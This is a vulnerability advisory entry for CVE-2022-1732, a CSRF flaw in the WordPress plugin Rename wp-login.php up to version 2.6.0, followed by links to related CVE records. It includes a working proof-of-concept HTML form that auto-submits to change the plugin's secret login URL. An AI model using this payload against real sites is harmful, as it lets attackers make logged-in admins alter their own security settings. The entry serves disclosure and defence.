Lucene search
Daniel RufWPEX-ID:3620A087-032E-4A5F-99C8-F9E7E9C29813HistoryJun 16, 2022 - 12:00 a.m.
Rename wp-login.php <= 2.6.0 - Secret URL Update via CSRF
2022-06-1600:00:00
Daniel Ruf
77
0.001 Low
EPSS
Percentile
26.5%
The plugin does not have CSRF check in place when updating the secret login URL, which could allow attackers to make a logged in admin change them via a CSRF attack
<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
<input type="text" name="rwl_page" value="sesame-open">
</form>
<script>
document.getElementById("test").submit();
</script>Related
cve
cve
CVE-2022-1732
2022-07-11 13:15:08
prion
prion
Cross site request forgery (csrf)
2022-07-11 13:15:00
cvelist
cvelist
CVE-2022-1732 Rename wp-login.php <= 2.6.0 - Secret URL Update via CSRF
2022-07-11 12:56:10
wpvulndb
wpvulndb
Rename wp-login.php <= 2.6.0 - Secret URL Update via CSRF
2022-06-16 00:00:00
cnvd
cnvd
WordPress Rename wp-login.php plugin跨站请求伪造漏洞
2022-07-13 00:00:00
nvd
nvd
CVE-2022-1732
2022-07-11 13:15:08